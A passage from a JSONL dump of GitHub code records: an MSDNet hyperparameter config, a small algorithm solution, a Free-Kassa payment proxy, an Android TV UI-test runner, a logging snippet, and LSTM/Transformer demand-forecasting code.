n_epochs = n_epochs,\n test_loss = test_loss_hyperparameters,\n gpu = gpu,\n loaders = loader_hyperparameters,\n )\n return hyperparameters\n\ndef get_network_hyperparameters(model_type):\n hyperparams = dict( # MSDNet architecture parameters\n call = 'MsdNet',\n in_shape = 32,\n out_dim = 100,\n n_scales = 3,\n n_exits = 3,\n nlayers_to_exit = 2,\n nlayers_between_exits = 2,\n nplanes_mulv = [2, 4, 8],\n nplanes_addh = 1,\n nplanes_init = 1,\n prune = \"min\",\n plane_reduction = 0, # Try this with 0 to avoid the halving\n exit_width = 128, # same as 128 dim 3x3 filters in exit?\n test_mode = True,\n dropout = \"block\",\n dropout_exit = True,\n dropout_p = 0.4,\n ) \n return hyperparams\n\ndef get_loss_hyperparameters(num_exits, model_type,loss_type = \"distillation_annealing\"):\n if model_type == \"msdnet\":\n if loss_type == \"distillation_annealing\":\n loss = dict( # distillation-based training with temperature\n # annealing\n call = 'DistillationBasedLoss',\n n_exits = num_exits,\n acc_tops = [1, 5],\n \n C = 0.5, # Confidence Limit (?)\n maxprob = 0.5, \n global_scale = 2.0 * 5/num_exits, # Not mentioned in paper\n # Temperature multiplier is 1.05 by default\n )\n elif loss_type == \"distillation_constant\":\n loss = dict( # distillation-based training with constant\n # temperature\n call = 'DistillationLossConstTemp',\n n_exits = num_exits,\n acc_tops = [1, 5],\n C = 0.5,\n T = 4.0,\n global_scale = 2.0 * 5/num_exits,\n )\n elif loss_type == \"classification\":\n loss = dict( # train with classification loss only\n call = 'ClassificationOnlyLoss',\n n_exits = num_exits,\n acc_tops = [1, 5],\n )\n else:\n # Add standard loss function stuff here\n pass\n return loss\n\ndef get_opt_sched_hyperparameters():\n cf_opt = dict( # optimization method\n call = 'SGD',\n lr = 0.5, # Note this is from Paper 9 (Paper 10 used 0.1)\n momentum = 0.9,\n weight_decay = 1e-4,\n nesterov = True,\n )\n cf_scheduler = dict( # learning rate schedule\n call = 'MultiStepLR',\n milestones = [150, 225],\n gamma = 0.1\n )\n return cf_opt, cf_scheduler\n\ndef get_loader_hyperparameters():\n hyperparameters = dict(dataset_name = \"cifar100\",\n batch_size = (1,1,250), #(train, val, test)\n augment = True,\n val_split = 0.1,\n )\n return hyperparameters\n\n\ndef get_test_hyperparameters(n_exits, model_type):\n if model_type == \"msdnet\":\n cf_loss = dict( # evaluation metric\n call = 'MultiExitAccuracy',\n n_exits = n_exits,\n acc_tops = (1,5),\n )\n return cf_loss\n","repo_name":"mailingliam02/MultiExit_BNNs","sub_path":"tests/test_hyperparameters.py","file_name":"test_hyperparameters.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"5390150982","text":"n = int(input())\ndata = []\nscore = [1]*n #덩치등수 기록\nfor _ in range(n):\n x,y = map(int,input().split())\n data.append((x,y))\n\nfor i in range(0,n-1):\n for j in range(i+1,n):\n if data[i][0] > data[j][0] and data[i][1] > data[j][1]:\n score[j]+=1\n elif data[i][0] < data[j][0] and data[i][1] < data[j][1]:\n score[i]+=1\n else: continue\n\nfor i in score:\n print(i, end=\" \")","repo_name":"easyDong19/PS_inARMY","sub_path":"baekjoon/past/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42160460525","text":"from aiohttp import web\n\nimport utils\nfrom configreader import Config\n\n\nasync def free_kassa_notification(request: 
web.Request):\n config: Config = request.app[\"config\"]\n\n # Список ip free-kassы на этой странице https://docs.freekassa.ru/#section/1.-Vvedenie/1.4.-Opoveshenie-o-platezhe\n allowed_ips = [\"168.119.157.136\", \"168.119.60.227\", \"138.201.88.124\", \"178.154.197.79\"]\n if request.client.host not in allowed_ips:\n raise web.HTTPUnauthorized\n\n kwargs = {\n \"params\": request.query,\n \"data\": await request.post(),\n }\n response = await utils.request(\n request.method, config.success_url, **{key: value for key, value in kwargs.items() if value is not None}\n )\n return web.Response(body=await response.text(), headers=response.headers, status=response.status)\n\n\n# Сюда редиректит пользователя при удачной оплате\nasync def free_kassa_success(request: web.Request):\n config: Config = request.app[\"config\"]\n\n response = await utils.request(request.method, config.success_url)\n return web.Response(body=await response.text(), headers=response.headers, status=response.status)\n\n\n# Сюда редиректит пользователя при неудачной оплате\nasync def free_kassa_failure(request: web.Request):\n config: Config = request.app[\"config\"]\n\n response = await utils.request(request.method, config.failure_url)\n return web.Response(body=await response.text(), headers=response.headers, status=response.status)\n\n\nroutes = [\n web.route(\"*\", \"/free-kassa/notification\", free_kassa_notification),\n web.get(\"/free-kassa/success\", free_kassa_success),\n web.get(\"/free-kassa/failure\", free_kassa_failure),\n]\n\n\napp = web.Application()\napp[\"config\"] = Config()\napp.add_routes(routes)\n\nweb.run_app(app, host=\"127.0.0.1\", port=8001)\n","repo_name":"alteralt/free-kassa-proxy","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33711046712","text":"import argparse\nimport subprocess\n\nimport sys\n\nimport app_tool\nimport device\nimport emulator\nimport logs_tool as logs\nimport utils\n\nparser = argparse.ArgumentParser()\n# env:\nparser.add_argument('--branch', metavar='Var', type=str, default='trunk',\n help='Branch for build apps')\nparser.add_argument('--signer_token', metavar='Var', type=str, default='NONE', help='Signer token')\nparser.add_argument('--tus_token', metavar='Var', type=str, default='NONE', help='TUS token')\nparser.add_argument('--testpalm_token', metavar='Var', type=str, default='NONE',\n help='Testpalm token')\n\n# options for tests:\nparser.add_argument('--droideka_url', metavar='Var', type=str,\n default='https://droideka.smarttv.yandex.net',\n help='API url: prod, prestable, testing')\nparser.add_argument('--ya_login', metavar='Var', type=str, default='NONE',\n help='Login for yandex account in tests')\nparser.add_argument('--ya_pass', metavar='Var', type=str, default='NONE',\n help='Password for yandex account in tests')\nparser.add_argument('--test_suite', metavar='Var', type=str, default='Acceptance',\n help='Acceptance, Regression, DroidekaRegression, '\n 'ModuleRegression, UpdaterAcceptance, ServicesSdkTests')\nparser.add_argument('--test_class', metavar='Var', type=str, default='NONE',\n help='For run all tests in class > provide class name. '\n 'Example: SearchScreen. '\n 'For run only one test > provide test name. 
'\n 'Example: SearchScreen#checkAllElements')\nparser.add_argument('--testpalm_report', metavar='Var', type=str, default='false',\n help='Send report to testpalm')\nparser.add_argument('--centaur_device_id', metavar='Var', type=str,\n default='NONE',\n help='Centaur device id')\nparser.add_argument('--product', metavar='Var', type=str, default='tv',\n help='tv, station, centaur, tv-updater, tv-services')\n\n# emulator:\nparser.add_argument('--emulator_api', metavar='Var', type=str, default='25',\n help='Android API for start emulator')\nparser.add_argument('--emulator_resolution', metavar='Var', type=str, default='1080',\n help='Emulator resolution. 1080 for use 1920x1080 and 720 for use 1280x720')\n\n# kolhoz:\nparser.add_argument('--kolhoz_token', metavar='Var', type=str, default='NONE', help='Kolhoz token')\nparser.add_argument('--kolhoz_device_id', metavar='Var', type=str, default='NONE',\n help='Kolhoz device id')\n\n# real device\nparser.add_argument('--serial_number', metavar='Var', type=str, default='NONE',\n help='Device IP or ID of module')\n\n# for debugging\nparser.add_argument('--emulator_only', metavar='Var', type=str, default='false',\n help='Run emulator with yandex apps')\nparser.add_argument('--delete_emulator', metavar='Var', type=str, default='true',\n help='Stop and delete emulator after tests')\nparser.add_argument('--skip_build_services', metavar='Var', type=str, default='false',\n help='If already built, you can skip this step')\nparser.add_argument('--skip_build_updater', metavar='Var', type=str, default='false',\n help='If already built, you can skip this step')\nparser.add_argument('--skip_build_video_player', metavar='Var', type=str, default='false',\n help='If already built, you can skip this step')\nparser.add_argument('--skip_download_apps', metavar='Var', type=str, default='false',\n help='If already built, you can skip this step')\nparser.add_argument('--is_sign_apps', metavar='Var', type=str, default='true',\n help=f'''Attention! 
Yandex passport will not work without sign apps.\n And iosdk don't get the config from quasmodrom.''')\nparser.add_argument('--quasar_id', metavar='Var', type=str,\n default='NONE',\n help='''You can set your own quasar ID.\n You need to create a config here:\n https://quasmodrom-test.quasar-int.yandex-team.ru/admin/development/device/\n ''')\n\ninput_args = parser.parse_args()\n\n\ndef run_sdk_tests_in_services():\n # build test_app\n app_tool.build_services_test_app()\n # build test_app_client\n app_tool.build_services_test_app_client('assembleDebug')\n # build test_app_client with android tests\n app_tool.build_services_test_app_client('assembleDebugAndroidTest')\n\n # start and prepare emulator\n app_tool.download_apps_for_regression(BUILD_CONFIG)\n serial_number = emulator.run_tv_emulator(BUILD_CONFIG)\n app_tool.push_all_apps_for_regression(serial_number, BUILD_CONFIG)\n app_tool.prepare_and_push_permission_for_enable_brick_mode(serial_number)\n device.reboot(serial_number, None)\n device.root_remount(serial_number)\n app_tool.prepare_and_push_device_owner_for_enable_brick_mode(serial_number)\n device.reboot(serial_number, None)\n device.root_remount(serial_number)\n device.disable_suw(serial_number, 'true')\n device.root_remount(serial_number)\n app_tool.print_installed_apps(serial_number)\n\n # install test_app\n app_tool.install_services_test_app(serial_number)\n\n # run tests\n return run_marathon_tests(BUILD_CONFIG)\n\n\ndef run_tests_on_centaur_emulator():\n # build apps\n app_tool.build_centaur_app(\"assembleDemoX86Debug\", BUILD_CONFIG)\n app_tool.build_centaur_app(\"assembleDemoX86DebugAndroidTest\", BUILD_CONFIG)\n\n # start and prepare emulator\n serial_number = emulator.run_centaur_emulator(BUILD_CONFIG)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n return status.returncode\n\n\ndef run_tests_on_station(serial_number):\n # build apps\n app_tool.build_quasar_app(\"assembleProdV7Debug\", BUILD_CONFIG)\n app_tool.build_quasar_app(\"assembleProdV7DebugAndroidTest\", BUILD_CONFIG)\n\n # prepare device\n device.connect_to_device_if_needed(serial_number, True)\n station_version = device.get_station_version(serial_number, BUILD_CONFIG)\n device.change_logs_buffer(serial_number)\n if station_version == '1':\n device.backup_system_quasar_app_on_station(serial_number, BUILD_CONFIG)\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n if station_version == '1':\n device.restore_system_quasar_app_on_station(serial_number, BUILD_CONFIG)\n\n # get logs\n logs.echo_title('Remove test apps')\n app_tool.uninstall_app(serial_number, 'ru.yandex.quasar.app')\n app_tool.uninstall_app(serial_number, 'ru.yandex.quasar.app.test')\n return status.returncode\n\n\ndef run_tests_on_station_emulator():\n # build apps\n app_tool.build_quasar_app(\"assembleProdX86Debug\", BUILD_CONFIG)\n app_tool.build_quasar_app(\"assembleProdX86DebugAndroidTest\", BUILD_CONFIG)\n app_tool.build_quasar_daemons()\n\n # sign apps\n app_paths = app_tool.get_app_paths()\n app_tool.sign_app_via_aosp_platform_key(app_paths[\"QuasarApp\"][\"main_app_path_x86\"])\n app_tool.sign_app_via_aosp_platform_key(app_paths[\"QuasarApp\"][\"test_app_path_x86\"])\n\n # run emulator\n 
serial_number = emulator.run_station_emulator(BUILD_CONFIG)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.get_quasar_daemons_logs(serial_number)\n device.take_screenshot(serial_number, 'screen_after_tests')\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n return status.returncode\n\n\ndef run_updater_isolated_tests_on_emulator():\n # build apps\n app_tool.build_updater_tests_app(\"assembleLocalTvTestUiLoggedDebug\", BUILD_CONFIG)\n app_tool.build_updater_tests_app(\"assembleLocalTvTestUiLoggedDebugAndroidTest\", BUILD_CONFIG)\n\n # start and prepare emulator\n serial_number = emulator.run_tv_emulator(BUILD_CONFIG)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n app_tool.build_and_push_services(serial_number, BUILD_CONFIG)\n device.reboot(serial_number, None)\n device.wait_wifi_connection_on_emulator(serial_number, BUILD_CONFIG[\"emulator_api\"])\n app_tool.print_installed_apps(serial_number)\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n return status.returncode\n\n\ndef run_tests_on_tv_emulator():\n\n BUILD_CONFIG['gradle_property_for_emulator'] = '-PisTestOnEmulator=true'\n app_tool.build_home_app(\"assembleDebug\", BUILD_CONFIG)\n app_tool.build_home_app(\"assembleDebugAndroidTest\", BUILD_CONFIG)\n\n serial_number = emulator.run_tv_emulator(BUILD_CONFIG)\n device.change_logs_buffer(serial_number)\n\n # Build abd push servicesIosdk, tvServices and tvPlatformServices\n if BUILD_CONFIG[\"test_suite\"] == 'Acceptance' or 'ChildMode' in BUILD_CONFIG[\"test_class\"]:\n app_tool.build_and_push_services(serial_number, BUILD_CONFIG)\n\n # Build abd push yandex updater\n if BUILD_CONFIG[\"test_suite\"] != 'Acceptance' or (\n BUILD_CONFIG[\"test_suite\"] != 'Acceptance' and BUILD_CONFIG[\"emulator_only\"] != 'true'):\n updater_apk_path = app_tool.build_updater(BUILD_CONFIG)\n app_tool.push_to_device(serial_number, updater_apk_path,\n app_tool.get_app_paths()[\"Updater\"][\"device_path\"])\n\n # Build abd push yandex bugReportSender\n if 'Bugreport' in BUILD_CONFIG[\"test_class\"]:\n app_tool.build_and_push_bugreportsender(serial_number, BUILD_CONFIG)\n\n # Build abd push yandex SetupWizard\n if 'SetupWizard' in BUILD_CONFIG[\"test_class\"]:\n app_tool.build_and_push_setup_wizard(serial_number, BUILD_CONFIG)\n\n # Build abd push YandexVideoPlayer, YandexTvInputService, YandexWebPlayer and YandexLiveTv\n if 'Player' in BUILD_CONFIG[\"test_class\"] or 'Tv' in BUILD_CONFIG[\"test_class\"]:\n app_tool.build_and_push_video_player_apps(serial_number, BUILD_CONFIG)\n\n # Build abd push other yandex apps\n if BUILD_CONFIG[\"test_suite\"] != 'Acceptance':\n app_tool.download_apps_for_regression(BUILD_CONFIG)\n app_tool.push_all_apps_for_regression(serial_number, BUILD_CONFIG)\n\n device.reboot(serial_number, None)\n device.wait_wifi_connection_on_emulator(serial_number, BUILD_CONFIG[\"emulator_api\"])\n\n if BUILD_CONFIG[\"test_suite\"] != 'Acceptance':\n device.root_remount(serial_number)\n device.disable_suw(serial_number, 
'true')\n\n device.stop_and_clear_home_app(serial_number)\n app_tool.print_installed_apps(serial_number)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n BUILD_CONFIG['annotation_for_block_tests_1'] = 'androidx.test.filters.RequiresDevice'\n BUILD_CONFIG['annotation_for_block_tests_2'] = 'androidx.test.filters.SdkSuppress'\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.rename_reports(serial_number, BUILD_CONFIG)\n\n if BUILD_CONFIG[\"delete_emulator\"] == 'true':\n emulator.stop_emulator(serial_number)\n emulator.delete_emulator(BUILD_CONFIG[\"emulator_name\"])\n return status\n\n\ndef run_tests_on_tv(serial_number):\n # build apps\n BUILD_CONFIG['gradle_property_for_emulator'] = '-PisTestOnEmulator=false'\n app_tool.build_home_app(\"assembleDebug\", BUILD_CONFIG)\n app_tool.build_home_app(\"assembleDebugAndroidTest\", BUILD_CONFIG)\n\n # prepare device\n device.connect_to_device_if_needed(serial_number, True)\n device.change_settings_on_device(serial_number)\n device.update_time_on_device(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n device.disable_suw(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n device.delete_apps_and_old_screenshots(serial_number)\n device.clear_data_in_apps(serial_number, BUILD_CONFIG[\"test_class\"])\n device.change_logs_buffer(serial_number)\n if BUILD_CONFIG[\"test_suite\"] == 'UpdaterAcceptance' or BUILD_CONFIG[\"test_class\"] == 'NONE' \\\n or 'Updater' in BUILD_CONFIG[\"test_class\"]:\n updater_apk_path = app_tool.build_updater(BUILD_CONFIG)\n app_tool.install_app(serial_number, updater_apk_path)\n device.stop_and_clear_home_app(serial_number)\n device.clear_logs_and_delete_bugreports(serial_number)\n app_tool.print_installed_apps(serial_number)\n logcat_process, log_file = logs.start_get_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n\n # run tests\n status = run_marathon_tests(BUILD_CONFIG)\n\n # get logs\n logs.stop_get_logs(logcat_process, log_file, BUILD_CONFIG[\"is_teamcity\"])\n device.delete_app('com.yandex.launcher.updaterapp', serial_number)\n logs.get_screenshots(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.get_anr_logs(serial_number, BUILD_CONFIG[\"is_teamcity\"])\n logs.rename_reports(serial_number, BUILD_CONFIG)\n return status\n\n\ndef run_tests(serial_number, is_on_emulator):\n if serial_number is None:\n serial_number = BUILD_CONFIG[\"serial_number\"]\n else:\n serial_number = serial_number\n\n if BUILD_CONFIG[\"product\"] == 'station':\n if is_on_emulator is True:\n return run_tests_on_station_emulator()\n else:\n return run_tests_on_station(serial_number)\n else:\n if is_on_emulator is True:\n return run_tests_on_tv_emulator()\n else:\n return run_tests_on_tv(serial_number)\n\n\ndef run_marathon_tests(environment):\n logs.echo_title('Run tests')\n return subprocess.run(f'''marathon \\\n --analyticsTracking=false \\\n --bugsnag=false \\\n --marathonfile=\"tv/ci/ui-tests/Marathonfile\"''', env=environment, shell=True)\n\n\nif __name__ == '__main__':\n device.install_python_requirements('requests', '2.27.1')\n device.install_python_requirements('retrying', '1.3.3')\n BUILD_CONFIG = utils.init_build_config(input_args)\n utils.print_env(BUILD_CONFIG)\n utils.check_apksigner()\n utils.check_avd_manager()\n\n if 
BUILD_CONFIG[\"emulator_only\"] == 'true':\n build_status = emulator.run_emulator_only(BUILD_CONFIG)\n elif BUILD_CONFIG[\"product\"] == 'centaur':\n build_status = run_tests_on_centaur_emulator()\n elif BUILD_CONFIG[\"kolhoz_device_id\"] != 'NONE':\n serial = device.connect_to_device_in_kolhoz(BUILD_CONFIG)\n build_status = run_tests(serial_number=serial, is_on_emulator=False)\n device.disconnect_from_device_in_kolhoz(BUILD_CONFIG)\n elif BUILD_CONFIG[\"serial_number\"] != 'NONE':\n build_status = run_tests(serial_number=None, is_on_emulator=False)\n elif BUILD_CONFIG[\"product\"] == 'tv-services':\n build_status = run_sdk_tests_in_services()\n elif BUILD_CONFIG[\"product\"] == 'tv-updater':\n build_status = run_updater_isolated_tests_on_emulator()\n else:\n build_status = run_tests(serial_number=None, is_on_emulator=True)\n\n utils.generate_allure_report(BUILD_CONFIG[\"is_teamcity\"])\n logs.send_report_to_testpalm(BUILD_CONFIG)\n logs.echo_title('Build finished')\n if build_status == 1:\n sys.exit(1)\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"smart devices/ui-tests/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":16081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18250589132","text":"import logging\n\n# https://docs.python.org/3/library/logging.html\nlogging.basicConfig(level = logging.INFO,format = '%(asctime)s %(name)s %(levelname)s %(filename)s:%(lineno)d %(message)s')\nlogger = logging.getLogger(__name__)\n\nlogger.info(\"Start print log\")\nlogger.debug(\"Do something\")\nlogger.warning(\"Something maybe fail.\")\nlogger.info(\"Finish\")\n","repo_name":"zhangxiaohei/python_tool","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70226241810","text":"from keras.models import Model\nfrom keras.layers import Input, Dense, Dropout, LayerNormalization\nfrom keras.layers import MultiHeadAttention, Flatten\nfrom keras.optimizers import Adam\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import LSTM, Dense, Dropout\nfrom keras.callbacks import EarlyStopping\nfrom keras.regularizers import l2\nfrom keras.callbacks import ModelCheckpoint\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n\n######## DATA PREPARATION ########\n\ndef create_train_test_data(journey_train_scaled, journey_test_scaled, lookback, boroughs):\n \"\"\"\n This function creates the input and output data for a DL model, that is designed to forecast bike sharing demand for each borough in London separately.\n It uses the concept of 'lookback', which is the number of past observations that the model uses to forecast the next one.\n \n Args:\n journey_train_scaled : DataFrame containing the scaled training data.\n journey_test_scaled : DataFrame containing the scaled testing data.\n lookback : int, Number of past observations to use for forecasting the next one.\n\n Returns:\n X_train : Array containing the input sequences for the training data.\n Y_train : Array containing the output sequences for the training data.\n X_test : Array containing the input sequences for the testing data.\n Y_test : Array containing the output sequences for the testing data.\n \"\"\"\n\n # identify indices of boroughs and demand in the dataframe\n borough_indices = [journey_train_scaled.columns.get_loc('start_borough_' + borough) for borough in boroughs]\n 
demand_index = journey_train_scaled.columns.get_loc('demand')\n\n # convert dataframes to numpy arrays\n journey_train_scaled = journey_train_scaled.values\n journey_test_scaled = journey_test_scaled.values\n\n # initialize lists to store input sequences and corresponding outputs\n X_train, Y_train = [], []\n X_test, Y_test = [], []\n\n # create training and testing sequences and corresponding outputs\n X_train, Y_train = _create_sequences(journey_train_scaled, borough_indices, demand_index, lookback, X_train, Y_train)\n X_test, Y_test = _create_sequences(journey_test_scaled, borough_indices, demand_index, lookback, X_test, Y_test)\n\n\n # convert lists to numpy arrays and return\n return np.array(X_train), np.array(Y_train), np.array(X_test), np.array(Y_test)\n\n\ndef _create_sequences(journey_scaled, borough_indices, demand_index, lookback, X, Y):\n \"\"\"\n Helper function to create sequences and corresponding outputs.\n \"\"\"\n for i in range(len(journey_scaled)):\n X_temp = [] # create a temporary list to store the current sequence\n current_borough = np.argmax(journey_scaled[i, borough_indices]) # identify the borough of the current data point\n X_temp.append(journey_scaled[i]) # add the current data point to the sequence\n\n for j in range(i+1, len(journey_scaled)): # iterate over the rest of the data points starting from the next data point\n if np.argmax(journey_scaled[j, borough_indices]) == current_borough: # if the borough of the current data point (j) is the same as the borough of the initial data point (i)\n X_temp.append(journey_scaled[j]) # add the current data point (j) to the sequence\n if len(X_temp) == lookback + 1: # if the sequence has reached the desired length (lookback + 1)\n X.append(np.array(X_temp[:-1])) # add the sequence (excluding the last data point) to the training input data\n Y.append(journey_scaled[i+lookback, demand_index]) # ddd the demand of the last data point in the sequence to the training output data\n break # break the inner loop as we have collected a complete sequence for training\n return X, Y\n\n\ndef min_max_scaling(journey_train, journey_test, journey_train_orig, journey_test_orig):\n \"\"\"\n This function scales the features in the journey data to a specified range (0 to 1) using Min-Max scaling.\n The scaler is fit on the training data and then used to transform both the training and test data. 
The 'demand' feature is then added back to the scaled data.\n\n Args:\n journey_train : DataFrame containing the journey training data.\n journey_test : DataFrame containing the journey testing data.\n journey_train_orig : Original (unscaled) DataFrame containing the journey training data.\n journey_test_orig : Original (unscaled) DataFrame containing the journey testing data.\n\n Returns:\n journey_train_scaled : DataFrame containing the scaled journey training data with 'demand' added back.\n journey_test_scaled : DataFrame containing the scaled journey testing data with 'demand' added back.\n \"\"\"\n\n # initialize the Min-Max scaler\n scaler = MinMaxScaler(feature_range=(0, 1))\n\n # fit the scaler using the training data and transform the training data\n journey_train_scaled = scaler.fit_transform(journey_train)\n\n # use the fitted scaler to transform the test data\n journey_test_scaled = scaler.transform(journey_test)\n\n # convert the scaled arrays back to DataFrames\n journey_train_scaled = pd.DataFrame(journey_train_scaled, columns=journey_train.columns)\n journey_test_scaled = pd.DataFrame(journey_test_scaled, columns=journey_test.columns)\n\n # add the 'demand' feature back to the scaled data\n journey_train_scaled['demand'] = journey_train_orig['demand'].values\n journey_test_scaled['demand'] = journey_test_orig['demand'].values\n\n return journey_train_scaled, journey_test_scaled\n\n\n\ndef positional_encoding(length, d_model):\n \"\"\"\n Compute positional encoding for a given sequence length and model dimension.\n \n Args:\n length (int): Length of the sequence.\n d_model (int): Dimension of the model.\n\n Returns:\n numpy.ndarray: Positional encoding matrix.\n \"\"\"\n pos_enc = np.zeros((length, d_model))\n for pos in range(length):\n for i in range(0, d_model, 2):\n pos_enc[pos, i] = np.sin(pos / (10000 ** ((2 * i) / d_model)))\n if i + 1 < d_model:\n pos_enc[pos, i + 1] = np.cos(pos / (10000 ** ((2 * i) / d_model)))\n\n return pos_enc\n\n\ndef add_positional_encoding(data):\n \"\"\"\n Add positional encoding to the input data.\n\n Args:\n data (numpy.ndarray): The input data with 3D tensor shape (num_samples, sequence_length, num_features).\n\n Returns:\n numpy.ndarray: The input data with added positional encoding.\n \"\"\"\n num_samples, sequence_length, num_features = data.shape\n pos_enc = positional_encoding(sequence_length, num_features)\n\n # expand dims to match shape of data\n pos_enc = np.expand_dims(pos_enc, axis=0)\n\n # repeat positional encoding for each sample\n pos_enc = np.repeat(pos_enc, num_samples, axis=0)\n\n return data + pos_enc\n\n\n\n\n######## LSTM MODEL ########\n\ndef create_lstm(X_train, units, dropout, reg):\n \"\"\"\n Create LSTM model with four LSTM layers and a dense output layer.\n \n Args:\n X_train (numpy.ndarray): The training data with shape (num_samples, sequence_length, num_features).\n units (int): The number of LSTM units for each layer.\n dropout (float): The dropout rate for the dropout layer after each LSTM layer.\n reg (float): The regularization factor. 
(Not used in this function, but can be used to add regularization to the LSTM layers)\n\n Returns:\n keras.models.Sequential: The constructed LSTM model.\n \"\"\"\n\n lstm_model = Sequential()\n # first lstm layer\n lstm_model.add(LSTM(units=units, return_sequences=True, input_shape=(X_train.shape[1], X_train.shape[2])))\n lstm_model.add(Dropout(dropout))\n # second lstm layer\n lstm_model.add(LSTM(units=units, return_sequences=True))\n lstm_model.add(Dropout(dropout))\n # third lstm layer\n lstm_model.add(LSTM(units=units, return_sequences=True))\n lstm_model.add(Dropout(dropout))\n # forth lstm layer\n lstm_model.add(LSTM(units=units))\n lstm_model.add(Dropout(dropout))\n # output layer\n lstm_model.add(Dense(units=1))\n return lstm_model\n\n\n\n\n######## TRANSFORMER MODEL ########\n\nclass Transformer:\n def __init__(self, num_heads=8, dropout_rate=0.1, num_layers=2):\n \"\"\"\n Initialize Transformer model with given parameters.\n\n Args:\n num_heads (int): The number of attention heads. Default is 8.\n dropout_rate (float): The dropout rate for Dropout layers. Default is 0.1.\n num_layers (int): The number of Transformer layers. Default is 2.\n \"\"\"\n self.num_heads = num_heads\n self.dropout_rate = dropout_rate\n self.num_layers = num_layers\n\n def create_transformer(self, input_shape):\n \"\"\"\n Create a Transformer model with the previously specified parameters.\n\n Args:\n input_shape (tuple): The shape of the input data.\n\n Returns:\n tensorflow.python.keras.engine.training.Model: The constructed Transformer model.\n \"\"\"\n inputs = Input(shape=input_shape)\n x = inputs\n for _ in range(self.num_layers):\n # Self-attention and normalization\n attn_output = MultiHeadAttention(num_heads=self.num_heads, key_dim=input_shape[-1])(x, x)\n attn_output = Dropout(self.dropout_rate)(attn_output)\n out1 = LayerNormalization(epsilon=1e-6)(x + attn_output)\n\n # Feed-forward and normalization\n ffn_output = Dense(input_shape[-1], activation='relu')(out1)\n ffn_output = Dense(input_shape[-1])(ffn_output)\n ffn_output = Dropout(self.dropout_rate)(ffn_output)\n out2 = LayerNormalization(epsilon=1e-6)(out1 + ffn_output)\n\n x = out2\n\n x = Flatten()(x)\n outputs = Dense(1)(x) \n\n return Model(inputs=inputs, outputs=outputs)\n\n def train(self, x_train, y_train, batch_size=32, epochs=10, validation_split=0.1):\n \"\"\"\n Train the Transformer model on the given training data.\n\n Args:\n x_train (numpy.ndarray): The training input data.\n y_train (numpy.ndarray): The training output data.\n batch_size (int): The batch size for training. Default is 32.\n epochs (int): The number of epochs to train for. Default is 10.\n validation_split (float): The fraction of the training data to be used as validation data. 
Default is 0.1.\n\n Returns:\n tensorflow.python.keras.callbacks.History: The history object that contains all information collected during training.\n \"\"\"\n\n # create transfomer\n model = self.create_transformer(x_train.shape[1:])\n\n # add adam optimizer\n model.compile(optimizer=Adam(), loss='mae') \n\n # add early stopping\n early_stopping = EarlyStopping(\n monitor='val_loss', \n patience=10,\n restore_best_weights=True\n )\n\n # create a model checkpoint \n checkpoint = ModelCheckpoint(\n \"./transformer_model_epoch_{epoch}.h5\", \n monitor=\"val_loss\", \n verbose=1, \n save_best_only=False, \n mode=\"auto\", \n save_freq=\"epoch\",\n )\n\n # fit model\n history = model.fit(\n x_train, \n y_train, \n batch_size=batch_size, \n epochs=epochs, \n validation_split=validation_split, \n callbacks=[early_stopping, checkpoint]\n )\n\n self.model = model\n return history\n\n def predict(self, x):\n \"\"\"\n Use the trained Transformer model to make predictions on the given data.\n\n Args:\n x (numpy.ndarray): The input data to make predictions on.\n\n Returns:\n numpy.ndarray: The predictions made by the model.\n \"\"\"\n return 